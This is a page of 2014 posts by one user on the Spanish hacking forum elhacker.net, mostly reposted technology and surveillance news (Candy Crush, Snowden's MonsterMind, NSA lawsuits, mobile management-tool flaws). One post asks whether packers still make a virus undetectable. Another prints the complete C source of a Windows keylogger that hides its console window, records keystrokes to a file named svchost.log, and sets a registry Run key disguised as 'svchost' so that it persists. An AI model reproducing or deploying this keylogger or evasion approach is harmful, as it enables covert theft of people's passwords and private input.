elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: También estamos presentes en BlueSky


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 49
71  Foros Generales / Noticias / ¿Comenzó el declive de Candy Crush? en: 14 Agosto 2014, 07:01 am

La compañía King Digital Entertainment lanzó Candy Crush en 2012 y desde entonces su éxito ha sido imparable, hasta ahora.

Parece que el reinado de Candy Crash Saga no será eterno.
El videojuego para teléfonos inteligentes y Facebook cuenta con 150 millones de usuarios únicos mensuales y 54 millones de personas lo juegan a diario. Sin embargo, sus desarrolladores ya hablan de un "esperado declive".

Lo hicieron a raíz de los resultados económicos correspondientes al segundo trimestre del año, que resultaron más bajos de lo esperado y que han hecho que King Digital Entertainment -la empresa desarrolladora- modifique las previsiones para 2014.
La compañía explicó este miércoles que ahora espera unos beneficios de entre US$2.250 millones y US$2.350 millones por la venta del juego, frente a las previsiones anteriores de entre US$2.550 millones y US$2.650 millones.
Además, el valor de sus acciones bajó un 22%, cerrando en US$18,20 en la Bolsa de Valores de Nueva York.
"Esperábamos la disminución (del éxito) de Candy Crush", reconoció el director financiero de Kings Digital Entertainment, Hope Cochran, en una entrevista con la BBC.
"Pero tiene una fuerte y larga cola", añadió.
Con ello se refirió al lanzamiento de un "juego hermano" de Candy Crush Saga, previsto para el cuarto trimestre de este año. "Eso dará longevidad al título original".

La historia de un éxito inmediato
Candy Crush Saga es un juego basado en rompecabezas, una variación del "conecta tres" o el clásico Tetris diseñado por el soviético Alexey Pajitnov y lanzado el 6 de junio de 1984.


El valor de las acciones de King han perdido el 22% de su valor, cerrando en $18,20 en la Bolsa de Nueva York.

El juego de King se maneja por episodios, cada uno con 15 niveles, a excepción del primero y el segundo, que tienen diez. Cada nivel tiene un tablero de juego de diferente forma lleno de dulces de entre tres y seis colores diferentes y a veces obstáculos.
El objetivo final es conseguir tres estrellas. Para ello, el jugador debe lograr la suficiente cantidad de puntos, intercambiando posiciones de caramelos, alineando estos en grupos de tres del mismo color y haciéndolos así desaparecer. Al eliminarse, causan que los dulces situados encima de ellos caigan en el espacio que queda debajo.
Candy Crush Saga es una variación para teléfonos inteligentes y Facebook del juego de navegador Candy Crush, también de King Digital Entertainment. Se lanzó el 12 de abril de 2012 y la aplicación para plataformas móviles vio la luz el 14 de noviembre del mismo año.
Desde entonces -y hasta ahora- su crecimiento fue imparable.
En marzo de 2013, Candy Crush Saga superó a FarmVille2, una aplicación en red que simula una granja y fue lanzada por Zynga en 2009, como el juego más popular en Facebook, con 45,6 millones de usuarios promedio al mes.
Y fue también número uno en ingresos en las tiendas Google Play y App Store, según la publicación especializada Business Insider, además de una de las páginas de Facebook más populares.
Con ello, el juego generó en 2013 el 78% de los beneficios de King Digital Entertainment.
Sin embargo, esa tendencia ascendente parece estar llegando a su fin.

Decadencia del juego, no de la compañía
Ante eso, los inversores están preocupados. Temen que el destino de Candy Crush Saga sea similar al de otros juegos, como Farmville y Angry Birds, cuyo éxito inicial se tradujo en una posterior calma comercial y un imparable descenso en las ventas.

Hay expertos que han mencionado amenazas concretas. Como la de Cascade, un juego del mismo género de Big Fish Games y que ya está disponible para teléfonos inteligentes y tabletas. El propio desarrollador dijo que la aplicación está destinada a "hacer que al fin renuncies a aplastar caramelos".
"Hay una competencia impresionante en el mercado, y por más exitoso que sea un juego, tiende a declinar. Lo mismo ocurrió con Angry Birds", explicó a ese respecto el bloguero de tecnología de BBC Mundo, David Cuen.
"El declive de Candy Crush está pasando, va a desaparecer", añadió. Pero matizó: "Eso no significa, sin embargo, que la empresa que la desarrolló decaerá. Por el contrario, en la era de la economía movil seguirá ganando dinero. Esto no será el inicio del fin de la empresa".
Efectivamente, la situación no es catastrófica para la compañía. Reportó un ingreso trimestral de US$594 millones, comparado con los US$456 que se embolsó en el mismo período el año pasado.
Pero para que el crecimiento no pare, los inversores esperan que King Digital Entertainment lance productos cuya hegemonía sea más duradera. Será cuestión de tener fe en el "juego hermano" de Candy Crush Saga.

http://www.bbc.co.uk/mundo/noticias/2014/08/140813_tecnologia_declive_candy_crush_lv.shtml
72  Foros Generales / Noticias / Snowden: La NSA tiene un programa secreto que funciona sin intervención humana en: 14 Agosto 2014, 06:57 am
Según las últimas revelaciones de Edward Snowden, la Agencia de Seguridad Nacional estadounidense dispone de un programa secreto llamado MonsterMind capaz de responder a los ataques cibernéticos sin intervención humana.

En su última revelación, el excontratista de la CIA Edward Snowden dijo a la revista 'Wired' que la NSA cuenta con un programa secreto de funcionamiento autónomo llamado MonsterMind que, además de poder responder automáticamente a ciberataques, podría causar una pesadilla diplomática internacional puesto que los ataques lanzados por el propio programa a menudo interfieren en las computadoras de terceros alojados en países extranjeros.

Y lo más grave: "Estos ataques pueden ser falsificados", aseguró Snowden. "Podríamos tener a alguien sentado en China, por ejemplo, haciendo que parezca que el que ha realizado el ataque es originario de Rusia. Y entonces terminamos 'disparando' hacia un hospital ruso. ¿Qué pasaría después?".

Snowden mencionó también que EE.UU. podría haber estado detrás del apagón masivo de Internet en Siria en 2012, cuando el país estaba en plena guerra civil. EE.UU. habría intentado recibir acceso al tráfico del país árabe, y un fallo durante el proceso podría haber causado la avería.

José Luis Camacho, investigador de conspiraciones y bloguero, cuestiona la legitimidad del funcionamiento del programa 'Monstermin’, ya que –según él-, podría violar la constitución de Estados Unidos. "En EE.UU. la propia Cuarta enmienda les prohíbe hacer una monitorización de las comunicaciones privadas y este sistema está infringiendo la Cuarta enmienda", explica a RT.
 
Este jueves el Servicio Federal de Migración de Rusia ha aprobado la petición de Edward Snowden de prolongar su asilo temporal en el país, según informa el abogado del extécnico, Anatoli Kucherena. "Es imposible la extradición de Snowden a EE.UU.", aseguró el abogado.

http://actualidad.rt.com/actualidad/view/137026-snowden-ans-programa-secreto-sin-intervencion-humana
73  Foros Generales / Noticias / ¿El ciberespacio se queda sin espacio?: Internet alcanza ya un tamaño preocupa.. en: 14 Agosto 2014, 06:55 am
¿El ciberespacio se queda sin espacio?: Internet alcanza ya un tamaño preocupante

Expertos alertan que los problemas técnicos que han provocado esta semana la caída de eBay podrían estar vinculados con la falta de memoria de Internet y la sobrecarga de los routers.



Los problemas técnicos que han provocado caídas de sitios web como el portal de subastas eBay podrían hacerse habituales debido al crecimiento del tráfico de internet y a la falta del espacio de memoria virtual, informa 'The Telegraph' citando a expertos.

Se estima que estos fallos técnicos podrían acarrear pérdidas millonarias para la economía debido a las caídas de las ventas debido a que zonas de varios sitios web ya están totalmente 'llenas'.

Este martes eBay quedó inaccesible durante varias horas para los usuarios de Reino Unido, así como de otras partes de Europa y de algunos lugares de EE.UU. La cuenta de eBay en Twitter se llenó de quejas de comerciantes que usan la página web de la compañía para obtener beneficio y exigieron compensaciones por la pérdida de ventas.

"Se trata realmente de que los routers están sobrecargados debido al número creciente de dispositivos usados y al panorama de Internet cada vez más fragmentado en pequeñas redes", explica Joss Wright, experto del Instituto de Internet de Oxford. Los routers ya no soportan el crecimiento del tráfico al igual que "el cerebro humano no podría recordar todos los caminos secundarios de un largo viaje en coche", añade.

Los routers son dispositivos que almacenan las tablas de rutas en la memoria. Aunque cada router tiene un número distinto de rutas en su memoria, la mayoría está cerca de las 512.000. Los expertos estiman que esta cifra es el punto de ruptura que los routers no pueden sobrepasar.

James Gill, el jefe ejecutivo de la empresa 'GoSquard', considera que estos fallos técnicos podrían costar millones de dólares a grandes empresas como eBay y que se necesitaría mucho tiempo para actualizar su hardware. "Si este tipo de fallos se convierte en algo regular, entonces será un problema grave tanto para las empresas como para la economía en general", alerta.

http://actualidad.rt.com/ciencias/view/137072-expertos-internet-tamano-problemas-serios
74  Foros Generales / Noticias / Demandan a la NSA por el temor de que su exdirector venda información secreta en: 2 Agosto 2014, 07:45 am
La Agencia de Seguridad Nacional de EE.UU. (NSA) está siendo nuevamente objeto de demanda, esta vez por no facilitar los archivos sobre su antiguo director, cuya conducta es motivo de críticas.



Esta semana el periodista Jason Leopold presentó una denuncia contra la NSA, la cual se suma a una serie de demandas que han surgido desde que el excontratista de la CIA Edward Snowden desvelara el espionaje de EE.UU. sobre millones de personas y gobiernos en todo el mundo.

La denuncia del periodista se debe a que la agencia se ha negado a suministrar la situación financiera relacionada con su exdirector, el general Keith Alexander, quien ahora ofrece consultoría en seguridad cibernética a empresas por un valor de 1 millón de dólares al mes, según informó Motherboard.

Pero la NSA rechazó la petición de Leopold. En su demanda, que busca obligar la liberación de los documentos de Alexander, Leopold argumenta que están siendo retenidos ilegalmente. En virtud de la Ley de Ética Gubernamental de 1978, la NSA tiene "un deber obligatorio, no discrecional para suministrar los registros solicitados", dice el periodista en la denuncia.


El representante demócrata por el estado de Florida, Alan Grayson, expresó sus preocupaciones en una carta. "Escribo con preocupación por la posible revelación de información clasificada por parte del exdirector de la Agencia de Seguridad Nacional Keith Alexander".

"La revelación o el mal uso de información clasificada con fines de lucro es, como bien sabe el señor Alexander, un delito grave. Me pregunto cómo el Señor Alexander puede proporcionar cualquiera de los servicios que está ofreciendo a menos que divulgue o haga mal uso de la información, incluyendo las fuentes y métodos clasificados extremadamente sensibles. Sin la información clasificada que adquirió en su anterior posición, literalmente, no tendría nada que ofrecer".

http://actualidad.rt.com/actualidad/view/135764-nsa-demanda-director-vender-informacion-snowden
75  Foros Generales / Noticias / 'Hackers' pueden controlar su celular mediante una herramienta ya integrada en: 2 Agosto 2014, 07:33 am
Investigadores descubrieron en una herramienta integrada en un gran número de 'smartphones' vulnerabilidades que permitirían a los 'hackers' instalar un código malicioso y tomar el control del dispositivo.



Las vulnerabilidades se encuentran dentro de unas herramientas de gestión que los fabricantes y los operadores integraron en los teléfonos y tabletas para configurarlos de forma remota. Aunque algunos diseñan su propia herramienta, la mayoría utiliza una desarrollada por un tercer vendedor específico al que los investigadores, Mathew Solnik y Marc Blanchou de Accuvant Labs, no identificarán hasta que presenten sus pruebas la próxima semana en una conferencia de seguridad en Las Vegas, informa Wired.

Los operadores usan la herramienta de gestión para enviar remotamente las actualizaciones de firmware, configurar los teléfonos para la itinerancia  o bloquear los dispositivos a los proveedores de servicios específicos. Pueden elegir en la herramienta las funciones básicas o solicitar otras adicionales. Solnik encontró que algunos teléfonos tienen las características para limpiar de forma remota el dispositivo, cambiar el PIN para el bloqueo de pantalla, configurar y desactivar las aplicaciones etc. Y los sistemas dan al operador la opción de hacer los cambios sin preguntar al consumidor, observa el medio.

Asimismo, cuantas más características de la herramienta de gestión ofrece el operador, más puede hacer un atacante. Como mínimo, todos los dispositivos examinados permitirían a un 'hacker' cambiar toda la funcionalidad de la red celular y controlar las actualizaciones de firmware. Incluso los teléfonos que utilizan únicamente el sistema de gestión más básico tienen vulnerabilidades de memoria que permitirían a un agresor ejecutar un código o instalar aplicaciones maliciosas, de acuerdo con los autores del estudio.

Según los investigadores, la herramienta se utiliza de alguna forma en más de 2.000 millones de teléfonos de todo el mundo. Las vulnerabilidades hasta ahora han sido encontradas en dispositivos de Android y BlackBerry y en un pequeño número de iPhones. Los dispositivos de Windows Mobile aún no se han comprobado.

Los autores del estudio dicen que por ahora no hay señales de que alguien se haya aprovechado de las vulnerabilidades, y la compañía que hace la herramienta anunció que ha emitido una solución que resolvería el problema.

http://actualidad.rt.com/actualidad/view/135753-hackers-controlar-movil-herramienta-integrada
76  Programación / Ingeniería Inversa / Métodos anti ingeniería inversa que se puedan usar para hacer virus indetectable en: 1 Agosto 2014, 19:15 pm
Estuve leendo un libro de 2005 sobre ingeniería inversa a raíz de eso surge mi pregunta. Aun funcionan los ofuscadores de código, como EXECryptor, StarForce suite  para hacer indetectable un virus, o la ofuscación del código fuente tendría que ser manual, estuve buscando en google y no encontré nada sobre el tema, el themida como todos sabemos ya no funciona, que hay de los programas anteriormente mencionados?
 
En libros actuales de 2014, sobre ingeniería inversa, aun se menciona que el método de ofuscación de código, puede ser usado en malwares
77  Programación / Programación C/C++ / En que directorio guarda los datos recolectados este keylogger en: 31 Julio 2014, 20:31 pm
Este es el codigo fuente del keylogger

Citar
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
   HWND stealth; /*creating stealth (window is not visible)*/
   AllocConsole();
   stealth=FindWindowA("ConsoleWindowClass",NULL);
   ShowWindow(stealth,0);
 
   int test,create;
   test=test_key();/*check if key is available for opening*/
       
   if (test==2)/*create key*/
   {
       char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
       create=create_key(path);
         
   }
       
 
   int t=get_keys();
   
   return t;


int get_keys(void)
{
           short character;
             while(1)
             {
                    sleep(10);/*to prevent 100% cpu usage*/
                    for(character=8;character<=222;character++)
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        { 
                           
                            FILE *file;
                            file=fopen("svchost.log","a+");
                            if(file==NULL)
                            {
                                    return 1;
                            }           
                            if(file!=NULL)
                            {       
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }       
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }
                                    else
                                    {
                                        switch(character)
                                        {
                                              case VK_SPACE:
                                              fputc(' ',file);
                                              fclose(file);
                                              break;   
                                              case VK_SHIFT:
                                              fputs("[SHIFT]",file);
                                              fclose(file);
                                              break;                                           
                                              case VK_RETURN:
                                              fputs("\n[ENTER]",file);
                                              fclose(file);
                                              break;
                                              case VK_BACK:
                                              fputs("[BACKSPACE]",file);
                                              fclose(file);
                                              break;
                                              case VK_TAB:
                                              fputs("[TAB]",file);
                                              fclose(file);
                                              break;
                                              case VK_CONTROL:
                                              fputs("[CTRL]",file);
                                              fclose(file);
                                              break;   
                                              case VK_DELETE:
                                              fputs("[DEL]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_1:
                                              fputs("[;:]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_2:
                                              fputs("[/?]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_3:
                                              fputs("[`~]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_4:
                                              fputs("[ [{ ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_5:
                                              fputs("[\\|]",file);
                                              fclose(file);
                                              break;                               
                                              case VK_OEM_6:
                                              fputs("[ ]} ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_7:
                                              fputs("['\"]",file);
                                              fclose(file);
                                              break;
                                              /*case VK_OEM_PLUS:
                                              fputc('+',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_COMMA:
                                              fputc(',',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_MINUS:
                                              fputc('-',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_PERIOD:
                                              fputc('.',file);
                                              fclose(file);
                                              break;*/
                                              case VK_NUMPAD0:
                                              fputc('0',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD2:
                                              fputc('2',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD4:
                                              fputc('4',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD9:
                                              fputc('9',file);
                                              fclose(file);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("[CAPS LOCK]",file);
                                              fclose(file);
                                              break;
                                              default:
                                              fclose(file);
                                              break;
                                       }       
                                  }   
                             }       
                   }   
               }                 
                   
           }
           return EXIT_SUCCESS;                           
}                                               

int test_key(void)
{
   int check;
   HKEY hKey;
   char path[BUFSIZE];
   DWORD buf_length=BUFSIZE;
   int reg_key;
   
   reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
   if(reg_key!=0)
   {   
       check=1;
       return check;
   }       
         
   reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
   
   if((reg_key!=0)||(buf_length>BUFSIZE))
       check=2;
   if(reg_key==0)
       check=0;
       
   RegCloseKey(hKey);
   return check; 
}
 
int create_key(char *path)

       int reg_key,check;
       
       HKEY hkey;
       
       reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
       if(reg_key==0)
       {
               RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
               check=0;
               return check;
       }
       if(reg_key!=0)
               check=1;
               
       return check;
}

78  Programación / Programación General / Por que no me es posible compilar en backtrack usando codeblock IDE en: 30 Julio 2014, 01:20 am
Me estoy iniciando en el tema de la programación, estoy tratando de compilar C++ en backtrack 5 r3 de 32 bit, usando codeblock IDE 8.02 cuando doy click en compilar,  solo me crea un archivo de texto y en la ventana de Built log, solo me aparece un mensaje que dice Nothing to be done.

A que se debe este problema?
79  Foros Generales / Noticias / Alemania espiará a EE.UU. y Reino Unido por primera vez desde 1945 en: 26 Julio 2014, 02:31 am
La canciller Angela Merkel decide espiar a sus dos socios en la OTAN tras exigir al jefe de la estación de la CIA en Berlín que dejara Alemania.



Angela Merkel, ha anunciado que su país vigilará las acciones de los agentes de los servicios estadounidenses y británicos en su territorio, informa The Daily Mail.

La decisión de la canciller se considera una respuesta al escándalo estallado recientemente en Alemania tras conocerse que la Agencia de Seguridad Nacional de EE.UU. (NSA, por sus siglas en inglés) espiaba a los ciudadanos de la República Federal.
 
Después de hacerse público que el NSA escuchaba a escondidas el teléfono móvil de Merkel, la canciller exigió que el jefe de la CIA en Berlín abandonara el territorio alemán.
 
La agencia de inteligencia alemana (BND, por sus siglas en alemán) llevará a cabo estricta vigilancia de las acciones de los agentes estadounidenses en territorio alemán. Esta decisión marca el primer caso de la observación de la inteligencia aliada por parte de Alemania desde el 1945, cuando las autoridades de Alemania Occidental decidieron dar libertad a estos servicios.
 
Esta semana el presidente de los EE.UU., Barack Obama, envió al jefe del Gabinete de la Casa Blanca, Denis McDonough, y a la asesora para la lucha contra el terrorismo, Lisa Monaco, a Berlín. Oficiales de la Casa Blanca afirman que en la capital alemana abordaron asuntos de seguridad.
 
"Sólo a través de negociaciones y acuerdos se puede restablecer la confianza. Aseguraremos que esas negociaciones tengan lugar, pero por ahora no puedo dar ningún dato concreto", admitió Merkel. Sin embargo, la canciller alemana sostiene que Alemania y EE.UU. siguen siendo socios y "nada puede cambiarlo".
 
Entretanto, la Casa Blanca no ha hecho ningún comentario.
 
Merkel desmintió la posibilidad de conceder permiso al ex-agente del NSA Edward Snowden de refugiarse en Alemania.
 
Un funcionario de la Casa Blanca aseguró que la CIA no utilizaría programas de vacunación como fachada para actividades de inteligencia. La CIA afirma que no tiene intención de utilizar los materiales genéticos obtenidos en el marco de estos programas.   

http://actualidad.rt.com/actualidad/view/135049-alemania-eeuu-espionaje-escandalo-reinounido
80  Foros Generales / Noticias / "Al Qaeda planea un 11-S cibernético contra EE.UU." en: 26 Julio 2014, 02:14 am
Al Qaeda, algunos países y grupos criminales están planeando amplios ataques cibernéticos contra la infraestructura estadounidense que se podrían comparar con el 11-S, afirmó un alto funcionario de justicia de EE.UU.



"Estamos en el momento previo a un 11-S cibernético", dijo John Carlin, fiscal general adjunto de seguridad nacional, citado por el portal Washington Free Beacon.

En una conferencia sobre seguridad, Carlin mencionó que recientemente el líder de Al Qaeda, Ayman al Zawahiri, publicó un vídeo en el que señaló que la red terrorista planea ciberataques contra redes eléctricas y financieras de EE.UU.

Como otro ejemplo, el funcionario recordó una operación contra la petrolera estatal saudita Aramco, que dejó fuera de servicio unos 30.000 ordenadores que controlaban los elementos cruciales de la infraestructura energética del país.

El fiscal general adjunto también se refirió al grupo criminal Gameover Zeus, que las autoridades estadounidenses lograron desarticular este año, como un ejemplo de potenciales ataques.

Se trata de una red que difundía los virus Gameover Zeus (conocido también como GOZeus y P2PZeus), que robaba de los ordenadores información bancaria y otros datos confidenciales, y Cryptolocker, un virus que bloqueaba los ordenadores y exigía a las víctimas un pago a cambio de la contraseña para acceder a la máquina. 
 
"Si un grupo terrorista se hace con este tipo de acceso o capacidad, no pedirán dinero ni se tomarán tiempo para destruir los datos", resaltó Carlin llamando a una cooperación entre el sector público y privado para lidiar con la amenaza.

Respecto a ciertos Estados que pueden amenazar las redes estadounidenses, mencionó las acusaciones formales del Gobierno de EE.UU. presentadas contra cinco miembros del Ejército Popular de Liberación de China por el presunto robo de secretos de empresas privadas estadounidenses a través de medios cibernéticos. 
 
Carlin dijo que el Departamento de Justicia se enfrenta a los ataques cibernéticos con métodos similares a la lucha antiterrorista.

"Hemos pasado a vigilar mejor lo que está pasando respecto a la información que está siendo robada día y noche de las computadoras de los estadounidenses creativos e innovadores y usada por sus rivales en contra de las empresas estadounidenses", comentó. 

Describió el nuevo enfoque de "multifacético y estratégico", que debe trazar una "línea roja" para disuadir a otros países de realizar ataques cibernéticos.

"Cada vez les saldrá más caro realizar este tipo de actividad en suelo estadounidense hasta que el robo de datos cese", prometió el funcionario. 

http://actualidad.rt.com/actualidad/view/135024-qaeda-planean-ataque-cibernetico-eeuu-11s
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 49
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines